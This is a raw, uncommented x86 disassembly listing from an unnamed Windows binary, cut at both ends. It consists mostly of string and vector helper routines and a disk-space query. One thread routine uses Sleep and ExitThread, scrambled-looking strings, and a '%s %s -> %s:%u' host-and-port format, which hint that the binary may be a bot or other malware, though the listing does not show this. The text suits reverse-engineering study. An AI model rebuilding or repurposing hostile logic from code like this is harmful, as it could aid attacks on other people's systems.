loc_41B027: ; CODE XREF: .text:0041A496�j
; .text:0041A839�j ...
call sub_41968F
loc_41B02C: ; CODE XREF: .text:0041ADA0�j
lea ecx, [ebp-0BCh]
call sub_41968F
lea ecx, [ebp-44h]
call sub_41968F
lea ecx, [ebp-0F0h]
call sub_41968F
lea ecx, [ebp-0ACh]
mov byte ptr [ebp-4], 3
call sub_41B173
loc_41B059: ; CODE XREF: .text:0041A256�j
cmp [ebp-3B4h], ebx
jnz loc_41A25B
jmp short loc_41B076
; ---------------------------------------------------------------------------
loc_41B067: ; CODE XREF: .text:0041A279�j
lea ecx, [ebp-0ACh]
mov byte ptr [ebp-4], 3
call sub_41B173
loc_41B076: ; CODE XREF: .text:0041B065�j
mov eax, [ebp-3B8h]
cmp eax, ebx
jnz short loc_41B091
push 5265C00h
push 36EE80h
call sub_41E415
pop ecx
pop ecx
loc_41B091: ; CODE XREF: .text:0041B07E�j
push eax
call dword_437190 ; Sleep
inc dword ptr [ebp-48h]
lea ecx, [ebp-0CCh]
call sub_41968F
lea ecx, [ebp-20h]
call sub_41968F
lea ecx, [ebp-30h]
mov [ebp-4], bl
call sub_41968F
mov eax, [ebp-48h]
cmp eax, [ebp-3C0h]
jl loc_41A192
loc_41B0C8: ; CODE XREF: .text:0041A182�j
cmp [ebp-3ACh], ebx
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
mov esi, offset aSSSU ; "%s %s -> %s:%u"
jnz short loc_41B108
cmp [ebp-3B0h], ebx
jnz short loc_41B110
push dword ptr [ebp-3C4h]
lea eax, [ebp-0C48h]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push edi
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_41CE4A
add esp, 1Ch
loc_41B108: ; CODE XREF: .text:0041B0D8�j
cmp [ebp-3B0h], ebx
jz short loc_41B136
loc_41B110: ; CODE XREF: .text:0041B0E0�j
push dword ptr [ebp-3C4h]
lea eax, [ebp-0C48h]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push edi
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_41CDD4
add esp, 1Ch
loc_41B136: ; CODE XREF: .text:0041B10E�j
push dword ptr [ebp-3C8h]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
; =============== S U B R O U T I N E =======================================
sub_41B149 proc near ; CODE XREF: .text:0041A0CE�p
; .text:0041A261�p
mov edx, ecx
call sub_419617
lea ecx, [edx+10h]
call sub_419617
lea ecx, [edx+20h]
call sub_419617
lea ecx, [edx+30h]
call sub_419617
lea ecx, [edx+44h]
call sub_419617
mov eax, edx
retn
sub_41B149 endp
; =============== S U B R O U T I N E =======================================
sub_41B173 proc near ; CODE XREF: .text:0041A149�p
; .text:0041B054�p ...
push esi
mov esi, ecx
lea ecx, [esi+44h]
call sub_41968F
lea ecx, [esi+30h]
call sub_41968F
lea ecx, [esi+20h]
call sub_41968F
lea ecx, [esi+10h]
call sub_41968F
mov ecx, esi
pop esi
jmp sub_41968F
sub_41B173 endp
; =============== S U B R O U T I N E =======================================
sub_41B19E proc near ; CODE XREF: sub_419913+132�p
; .text:00436333�j
push esi
mov esi, ecx
push dword ptr [esi+4]
call sub_4290D0
xor eax, eax
pop ecx
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
pop esi
retn
sub_41B19E endp
; =============== S U B R O U T I N E =======================================
sub_41B1B7 proc near ; CODE XREF: sub_419913+112�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_41B1D2
mov eax, [esi+8]
sub eax, ecx
sar eax, 2
cmp eax, edi
ja short loc_41B1D9
loc_41B1D2: ; CODE XREF: sub_41B1B7+D�j
mov ecx, esi
call sub_41B1F5
loc_41B1D9: ; CODE XREF: sub_41B1B7+19�j
mov eax, [esi+4]
lea eax, [eax+edi*4]
pop edi
pop esi
retn 4
sub_41B1B7 endp
; =============== S U B R O U T I N E =======================================
sub_41B1E4 proc near ; CODE XREF: sub_419913+76�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push dword ptr [ecx+8]
call sub_41B647
retn 4
sub_41B1E4 endp
; =============== S U B R O U T I N E =======================================
sub_41B1F5 proc near ; CODE XREF: sub_41B1B7+1D�p
mov eax, offset loc_4365E4
call sub_42B7CC
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_41B4ED
mov esi, offset aInvalidVectorT ; "invalid vector<T> subscript"
push esi
call sub_4293A0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_41B525
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_41B24F
lea eax, [ebp-3Ch]
push offset dword_438474
push eax
mov dword ptr [ebp-3Ch], offset off_4373D4
call sub_42B8FA
pop esi
sub_41B1F5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B24F proc near ; CODE XREF: sub_41B1F5+3F�p
; sub_4290DB+3F�p ...
mov eax, offset loc_4365F8
call sub_42B7CC
push ecx
push ecx
push ebx
push esi
lea eax, [ebp-10h]
push edi
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset byte_454A54
call sub_42B994
mov ebx, [ebp+8]
and dword ptr [ebp-4], 0
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_41B4ED
push 0FFFFFFFFh
push 0
push ebx
mov ecx, edi
call sub_41B420
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_4373C4
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_41B24F endp
; =============== S U B R O U T I N E =======================================
sub_41B2AF proc near ; DATA XREF: .text:004373A8�o
; .text:004373C8�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_41B2BB
mov eax, offset dword_437338
locret_41B2BB: ; CODE XREF: sub_41B2AF+5�j
retn
sub_41B2AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B2BC proc near ; DATA XREF: .text:004373CC�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41B332
lea eax, [ebp+var_1C]
push offset dword_4384D8
push eax
call sub_42B8FA
sub_41B2BC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B2D9 proc near ; CODE XREF: .text:0041B319�p
; DATA XREF: .text:004384DC�o
mov eax, offset loc_43660C
call sub_42B7CC
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4373C4
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_41B4ED
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_42BA1B
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_41B2D9 endp
; ---------------------------------------------------------------------------
loc_41B316: ; DATA XREF: .text:off_4373C4�o
push esi
mov esi, ecx
call sub_41B2D9
test byte ptr [esp+8], 1
jz short loc_41B32C
push esi
call sub_4290D0
pop ecx
loc_41B32C: ; CODE XREF: .text:0041B323�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_41B332 proc near ; CODE XREF: sub_41B2BC+A�p
; sub_41B400+7�p ...
mov eax, offset loc_436620
call sub_42B7CC
push ecx
push ebx
mov ebx, [ebp+8]
push esi
push edi
mov esi, ecx
push ebx
mov [ebp-10h], esi
call sub_42B9D1
and dword ptr [ebp-4], 0
add ebx, 0Ch
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_41B4ED
push 0FFFFFFFFh
push 0
push ebx
mov ecx, edi
call sub_41B420
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_4373C4
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_41B332 endp
; =============== S U B R O U T I N E =======================================
sub_41B38A proc near ; CODE XREF: sub_41B3C7+20�p
; DATA XREF: .text:00438478�o
mov eax, offset loc_436634
call sub_42B7CC
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4373C4
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_41B4ED
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_42BA1B
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_41B38A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3C7 proc near ; DATA XREF: .text:004373DC�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41B400
lea eax, [ebp+var_1C]
push offset dword_438474
push eax
call sub_42B8FA
loc_41B3E4: ; DATA XREF: .text:off_4373D4�o
push esi
mov esi, ecx
call sub_41B38A
test [esp+20h+var_18], 1
jz short loc_41B3FA
push esi
call sub_4290D0
pop ecx
loc_41B3FA: ; CODE XREF: sub_41B3C7+2A�j
mov eax, esi
pop esi
retn 4
sub_41B3C7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B400 proc near ; CODE XREF: sub_41B3C7+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41B332
mov dword ptr [esi], offset off_4373D4
mov eax, esi
pop esi
retn 4
sub_41B400 endp
; ---------------------------------------------------------------------------
loc_41B418: ; CODE XREF: .text:004365DF�j
; .text:0043668F�j ...
push 1
call sub_41B4ED
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B420 proc near ; CODE XREF: sub_41B24F+42�p
; sub_41B332+3A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_41B438
call sub_4291C3
loc_41B438: ; CODE XREF: sub_41B420+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_41B44A
mov esi, [ebp+arg_8]
loc_41B44A: ; CODE XREF: sub_41B420+25�j
cmp edi, ebx
jnz short loc_41B468
add esi, ecx
push 0FFFFFFFFh
push esi
mov ecx, edi
call sub_41B55A
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_41B55A
jmp short loc_41B4E4
; ---------------------------------------------------------------------------
loc_41B468: ; CODE XREF: sub_41B420+2C�j
test esi, esi
jbe short loc_41B4AB
cmp esi, eax
jnz short loc_41B4AB
mov eax, [ebx+4]
test eax, eax
jnz short loc_41B47C
mov eax, offset dword_437338
loc_41B47C: ; CODE XREF: sub_41B420+55�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_41B4AB
push 1
mov ecx, edi
call sub_41B4ED
mov eax, [ebx+4]
test eax, eax
jnz short loc_41B497
mov eax, offset dword_437338
loc_41B497: ; CODE XREF: sub_41B420+70�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_41B4E4
; ---------------------------------------------------------------------------
loc_41B4AB: ; CODE XREF: sub_41B420+4A�j
; sub_41B420+4E�j ...
push 1
push esi
mov ecx, edi
call sub_41B5C1
test al, al
jz short loc_41B4E4
mov eax, [ebp+arg_0]
mov eax, [eax+4]
test eax, eax
jnz short loc_41B4C8
mov eax, offset dword_437338
loc_41B4C8: ; CODE XREF: sub_41B420+A1�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_429420
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_41B4E4: ; CODE XREF: sub_41B420+46�j
; sub_41B420+89�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_41B420 endp
; =============== S U B R O U T I N E =======================================
sub_41B4ED proc near ; CODE XREF: sub_41B1F5+19�p
; sub_41B24F+36�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_41B515
mov eax, [esi+4]
test eax, eax
jz short loc_41B515
dec eax
mov cl, [eax]
test cl, cl
jz short loc_41B50E
cmp cl, 0FFh
jz short loc_41B50E
dec byte ptr [eax]
jmp short loc_41B515
; ---------------------------------------------------------------------------
loc_41B50E: ; CODE XREF: sub_41B4ED+16�j
; sub_41B4ED+1B�j
push eax
call sub_4290D0
pop ecx
loc_41B515: ; CODE XREF: sub_41B4ED+8�j
; sub_41B4ED+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_41B4ED endp
; =============== S U B R O U T I N E =======================================
sub_41B525 proc near ; CODE XREF: sub_41B1F5+2F�p
; sub_41B8CF+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
push edi
mov esi, ecx
call sub_41B5C1
test al, al
jz short loc_41B553
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_429420
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_41B553: ; CODE XREF: sub_41B525+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_41B525 endp
; =============== S U B R O U T I N E =======================================
sub_41B55A proc near ; CODE XREF: sub_41B420+35�p
; sub_41B420+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_41B56D
call sub_4291C3
loc_41B56D: ; CODE XREF: sub_41B55A+C�j
mov ecx, edi
call sub_41B8CF
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_41B583
mov ebx, eax
loc_41B583: ; CODE XREF: sub_41B55A+25�j
test ebx, ebx
jbe short loc_41B5B9
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_42BA90
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_41B5C1
test al, al
jz short loc_41B5B9
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_41B5B9: ; CODE XREF: sub_41B55A+2B�j
; sub_41B55A+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_41B55A endp
; =============== S U B R O U T I N E =======================================
sub_41B5C1 proc near ; CODE XREF: sub_41B420+90�p
; sub_41B525+B�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_41B5D3
call sub_4290DB
loc_41B5D3: ; CODE XREF: sub_41B5C1+B�j
mov eax, [esi+4]
xor edx, edx
cmp eax, edx
jz short loc_41B5FB
mov cl, [eax-1]
cmp cl, dl
jz short loc_41B5FB
cmp cl, 0FFh
jz short loc_41B5FB
cmp edi, edx
mov ecx, esi
jnz short loc_41B63A
dec byte ptr [eax-1]
push edx
loc_41B5F2: ; CODE XREF: sub_41B5C1+48�j
call sub_41B4ED
loc_41B5F7: ; CODE XREF: sub_41B5C1+4C�j
; sub_41B5C1+53�j
xor al, al
jmp short loc_41B642
; ---------------------------------------------------------------------------
loc_41B5FB: ; CODE XREF: sub_41B5C1+19�j
; sub_41B5C1+20�j ...
cmp edi, edx
jnz short loc_41B616
cmp [esp+8+arg_4], dl
jz short loc_41B60B
push 1
mov ecx, esi
jmp short loc_41B5F2
; ---------------------------------------------------------------------------
loc_41B60B: ; CODE XREF: sub_41B5C1+42�j
cmp eax, edx
jz short loc_41B5F7
mov [esi+8], edx
mov [eax], dl
jmp short loc_41B5F7
; ---------------------------------------------------------------------------
loc_41B616: ; CODE XREF: sub_41B5C1+3C�j
cmp [esp+8+arg_4], dl
jz short loc_41B633
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_41B628
cmp eax, edi
jnb short loc_41B640
loc_41B628: ; CODE XREF: sub_41B5C1+61�j
push 1
mov ecx, esi
call sub_41B4ED
jmp short loc_41B638
; ---------------------------------------------------------------------------
loc_41B633: ; CODE XREF: sub_41B5C1+59�j
cmp [esi+0Ch], edi
jnb short loc_41B640
loc_41B638: ; CODE XREF: sub_41B5C1+70�j
mov ecx, esi
loc_41B63A: ; CODE XREF: sub_41B5C1+2B�j
push edi
call sub_41B812
loc_41B640: ; CODE XREF: sub_41B5C1+65�j
; sub_41B5C1+75�j
mov al, 1
loc_41B642: ; CODE XREF: sub_41B5C1+38�j
pop edi
pop esi
retn 8
sub_41B5C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B647 proc near ; CODE XREF: sub_41B1E4+9�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ecx
push edi
mov edi, [ebp+arg_4]
mov ecx, [esi+8]
mov eax, [esi+0Ch]
sub eax, ecx
sar eax, 2
cmp eax, edi
jnb loc_41B739
mov edx, [esi+4]
test edx, edx
jz short loc_41B678
mov eax, ecx
sub eax, edx
sar eax, 2
cmp edi, eax
jb short loc_41B67A
loc_41B678: ; CODE XREF: sub_41B647+24�j
mov eax, edi
loc_41B67A: ; CODE XREF: sub_41B647+2F�j
test edx, edx
jnz short loc_41B682
xor ecx, ecx
jmp short loc_41B687
; ---------------------------------------------------------------------------
loc_41B682: ; CODE XREF: sub_41B647+35�j
sub ecx, edx
sar ecx, 2
loc_41B687: ; CODE XREF: sub_41B647+39�j
add eax, ecx
test eax, eax
mov [ebp+var_4], eax
jge short loc_41B692
xor eax, eax
loc_41B692: ; CODE XREF: sub_41B647+47�j
shl eax, 2
push eax
call sub_42B4D7
mov edx, eax
mov eax, [esi+4]
pop ecx
mov [ebp+arg_4], edx
jmp short loc_41B6B4
; ---------------------------------------------------------------------------
loc_41B6A6: ; CODE XREF: sub_41B647+70�j
test edx, edx
jz short loc_41B6AE
mov ecx, [eax]
mov [edx], ecx
loc_41B6AE: ; CODE XREF: sub_41B647+61�j
add edx, 4
add eax, 4
loc_41B6B4: ; CODE XREF: sub_41B647+5D�j
cmp eax, [ebp+arg_0]
jnz short loc_41B6A6
test edi, edi
mov eax, edx
jbe short loc_41B6D2
mov ecx, edi
loc_41B6C1: ; CODE XREF: sub_41B647+89�j
test eax, eax
jz short loc_41B6CC
mov ebx, [ebp+arg_8]
mov ebx, [ebx]
mov [eax], ebx
loc_41B6CC: ; CODE XREF: sub_41B647+7C�j
add eax, 4
dec ecx
jnz short loc_41B6C1
loc_41B6D2: ; CODE XREF: sub_41B647+76�j
mov eax, [esi+8]
mov ecx, edi
shl ecx, 2
cmp [ebp+arg_0], eax
mov [ebp+arg_8], eax
lea ebx, [ecx+edx]
jz short loc_41B701
mov eax, ebx
sub eax, ecx
sub eax, edx
add eax, [ebp+arg_0]
loc_41B6EE: ; CODE XREF: sub_41B647+B8�j
test ebx, ebx
jz short loc_41B6F6
mov ecx, [eax]
mov [ebx], ecx
loc_41B6F6: ; CODE XREF: sub_41B647+A9�j
add eax, 4
add ebx, 4
cmp eax, [ebp+arg_8]
jnz short loc_41B6EE
loc_41B701: ; CODE XREF: sub_41B647+9C�j
push dword ptr [esi+4]
call sub_4290D0
mov eax, [ebp+var_4]
mov edx, [esi+4]
pop ecx
mov ecx, [ebp+arg_4]
test edx, edx
lea eax, [ecx+eax*4]
mov [esi+0Ch], eax
jnz short loc_41B721
xor eax, eax
jmp short loc_41B729
; ---------------------------------------------------------------------------
loc_41B721: ; CODE XREF: sub_41B647+D4�j
mov eax, [esi+8]
sub eax, edx
sar eax, 2
loc_41B729: ; CODE XREF: sub_41B647+D8�j
add eax, edi
mov [esi+4], ecx
lea eax, [ecx+eax*4]
mov [esi+8], eax
jmp loc_41B80B
; ---------------------------------------------------------------------------
loc_41B739: ; CODE XREF: sub_41B647+19�j
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, edx
sar eax, 2
cmp eax, edi
jnb short loc_41B7B5
mov ebx, edi
shl ebx, 2
cmp edx, ecx
mov [ebp+arg_0], ebx
lea eax, [ebx+edx]
mov [ebp+var_4], eax
jz short loc_41B77C
sub eax, ebx
mov ebx, [ebp+var_4]
mov [ebp+arg_4], eax
loc_41B761: ; CODE XREF: sub_41B647+130�j
test ebx, ebx
jz short loc_41B76C
mov eax, [eax]
mov [ebx], eax
mov eax, [ebp+arg_4]
loc_41B76C: ; CODE XREF: sub_41B647+11C�j
add eax, 4
add ebx, 4
cmp eax, ecx
mov [ebp+arg_4], eax
jnz short loc_41B761
mov ebx, [ebp+arg_0]
loc_41B77C: ; CODE XREF: sub_41B647+110�j
mov eax, [esi+8]
mov ecx, eax
sub ecx, edx
sar ecx, 2
sub edi, ecx
mov ecx, [ebp+arg_8]
jz short loc_41B7A0
mov [ebp+arg_0], edi
loc_41B790: ; CODE XREF: sub_41B647+157�j
test eax, eax
jz short loc_41B798
mov edi, [ecx]
mov [eax], edi
loc_41B798: ; CODE XREF: sub_41B647+14B�j
add eax, 4
dec [ebp+arg_0]
jnz short loc_41B790
loc_41B7A0: ; CODE XREF: sub_41B647+144�j
mov eax, [esi+8]
jmp short loc_41B7AC
; ---------------------------------------------------------------------------
loc_41B7A5: ; CODE XREF: sub_41B647+167�j
mov edi, [ecx]
mov [edx], edi
add edx, 4
loc_41B7AC: ; CODE XREF: sub_41B647+15C�j
cmp edx, eax
jnz short loc_41B7A5
add [esi+8], ebx
jmp short loc_41B80B
; ---------------------------------------------------------------------------
loc_41B7B5: ; CODE XREF: sub_41B647+FE�j
test edi, edi
jbe short loc_41B80B
shl edi, 2
mov eax, ecx
mov ebx, ecx
mov [ebp+arg_0], edi
sub eax, edi
jmp short loc_41B7D8
; ---------------------------------------------------------------------------
loc_41B7C7: ; CODE XREF: sub_41B647+193�j
test ebx, ebx
jz short loc_41B7D2
mov edi, [eax]
mov [ebx], edi
mov edi, [ebp+arg_0]
loc_41B7D2: ; CODE XREF: sub_41B647+182�j
add ebx, 4
add eax, 4
loc_41B7D8: ; CODE XREF: sub_41B647+17E�j
cmp eax, ecx
jnz short loc_41B7C7
mov ecx, [esi+8]
mov eax, ecx
sub eax, edi
cmp edx, eax
jz short loc_41B7F5
loc_41B7E7: ; CODE XREF: sub_41B647+1AC�j
sub eax, 4
sub ecx, 4
cmp eax, edx
mov ebx, [eax]
mov [ecx], ebx
jnz short loc_41B7E7
loc_41B7F5: ; CODE XREF: sub_41B647+19E�j
lea eax, [edi+edx]
jmp short loc_41B804
; ---------------------------------------------------------------------------
loc_41B7FA: ; CODE XREF: sub_41B647+1BF�j
mov ecx, [ebp+arg_8]
mov ecx, [ecx]
mov [edx], ecx
add edx, 4
loc_41B804: ; CODE XREF: sub_41B647+1B1�j
cmp edx, eax
jnz short loc_41B7FA
add [esi+8], edi
loc_41B80B: ; CODE XREF: sub_41B647+ED�j
; sub_41B647+16C�j ...
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_41B647 endp
; =============== S U B R O U T I N E =======================================
sub_41B812 proc near ; CODE XREF: sub_41B5C1+7A�p
mov eax, offset loc_436640
call sub_42B7CC
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_41B838
mov edi, [ebp+8]
loc_41B838: ; CODE XREF: sub_41B812+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_41B845
xor eax, eax
loc_41B845: ; CODE XREF: sub_41B812+2F�j
push eax
call sub_42B4D7
pop ecx
mov [ebp+8], eax
jmp short loc_41B876
; ---------------------------------------------------------------------------
loc_41B851: ; DATA XREF: .text:00438570�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_41B860
xor eax, eax
loc_41B860: ; CODE XREF: sub_41B812+4A�j
push eax
call sub_42B4D7
mov [ebp+8], eax
pop ecx
mov eax, offset loc_41B870
retn
; ---------------------------------------------------------------------------
loc_41B870: ; DATA XREF: sub_41B812+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_41B876: ; CODE XREF: sub_41B812+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_41B894
cmp eax, edi
jbe short loc_41B883
mov eax, edi
loc_41B883: ; CODE XREF: sub_41B812+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_429420
add esp, 0Ch
loc_41B894: ; CODE XREF: sub_41B812+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_41B4ED
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_41B8B4
mov edi, ebx
loc_41B8B4: ; CODE XREF: sub_41B812+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [edi+eax], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_41B812 endp
; =============== S U B R O U T I N E =======================================
sub_41B8CF proc near ; CODE XREF: sub_41B55A+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_41B8FC
mov al, [esi-1]
test al, al
jz short loc_41B8FC
cmp al, 0FFh
jz short loc_41B8FC
push 1
call sub_41B4ED
push esi
call sub_4293A0
pop ecx
push eax
push esi
mov ecx, edi
call sub_41B525
loc_41B8FC: ; CODE XREF: sub_41B8CF+9�j
; sub_41B8CF+10�j ...
pop edi
pop esi
retn
sub_41B8CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B8FF proc near ; CODE XREF: sub_41B952+F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
push edi
or eax, 0FFFFFFFFh
push 1
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
call dword_457004 ; SetErrorMode
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call dword_4370E4 ; GetDiskFreeSpaceExA
push 2
call dword_457004 ; SetErrorMode
mov eax, [ebp+arg_0]
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_41B8FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B952 proc near ; CODE XREF: sub_41BE01+2A0�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_41B8FF
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jnz short loc_41B9A6
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jnz short loc_41B9A6
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jnz short loc_41B9A6
xor eax, eax
mov [ebp+var_30], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_1C], eax
jmp short loc_41B9E4
; ---------------------------------------------------------------------------
loc_41B9A6: ; CODE XREF: sub_41B952+29�j
; sub_41B952+34�j ...
mov eax, [ebp+arg_8]
cdq
mov edi, edx
mov esi, eax
push edi
push esi
push [ebp+var_14]
push [ebp+var_18]
call sub_42B2F0
push edi
push esi
push [ebp+var_C]
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
push [ebp+var_10]
call sub_42B2F0
push edi
push esi
push [ebp+var_4]
mov [ebp+var_28], eax
mov [ebp+var_24], edx
push [ebp+var_8]
call sub_42B2F0
mov [ebp+var_1C], edx
loc_41B9E4: ; CODE XREF: sub_41B952+52�j
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
push 6
lea esi, [ebp+var_30]
pop ecx
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_41B952 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B9F8 proc near ; CODE XREF: sub_401990+87�p
; sub_40A9FE+193F�p ...
var_2C = qword ptr -2Ch
